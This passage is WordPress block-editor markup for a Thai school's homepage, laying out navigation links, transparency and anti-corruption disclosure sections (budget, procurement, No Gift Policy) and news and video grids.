class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- 